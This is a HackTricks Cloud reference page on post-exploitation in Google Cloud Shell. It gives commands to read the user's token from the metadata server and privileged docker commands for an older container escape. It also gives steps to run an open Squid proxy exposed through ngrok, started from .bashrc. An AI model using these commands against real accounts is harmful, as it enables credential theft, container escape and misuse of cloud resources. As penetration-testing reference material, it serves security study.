🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / GCP - Cloud Shell Post Exploitation

GCP - Cloud Shell Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

Cloud Shell

For more information about Cloud Shell check:

{{#ref}}
../gcp-services/gcp-cloud-shell-enum.md
{{#endref}}

Obtains users token from metadata

Just accessing the metadata server you can obtain a token to access as the currently logged on user:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"

Container Escape / Docker use

⚠️ Warning
Previously the cloud shell run in a container with access to the docker socket of the host. Now Google has changed the architecture and the cloud shell container runs a "Docker in a container" setup. So even if it's possible to use docker from the cloud shell, you won't be able to escape to the host using the docker socket. Note that previously the `docker.sock` file was located in `/google/host/var/run/docker.sock` but now it has been moved to `/run/docker.sock`.
Docker use / Old container escape commands 
sudo docker -H unix:///run/docker.sock pull alpine:latest
sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///run/docker.sock start escaper
sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh

Moreover, in the past it was possible to find a token for a service account used by the cloud shell VM in the metadata server:

Old service account from metadata 
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
With the following scopes: 
wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Use it as Proxy

If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):

Install Squid proxy 
sudo apt install -y squid

Just for let you know Squid is a http proxy server. Create a squid.conf file with the following settings:

Create squid.conf file 
http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

copy the squid.conf file to /etc/squid

Copy config to /etc/squid 
sudo cp squid.conf /etc/squid

Finally run the squid service:

Start Squid service 
sudo service squid start

Use ngrok to let the proxy be available from outside:

Expose proxy with ngrok 
./ngrok tcp 3128

After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).

For better use at startup the .bashrc file should have the following lines:

Add to .bashrc for automatic startup 
sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

The instructions were copied from https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.

{{#include ../../../banners/hacktricks-training.md}}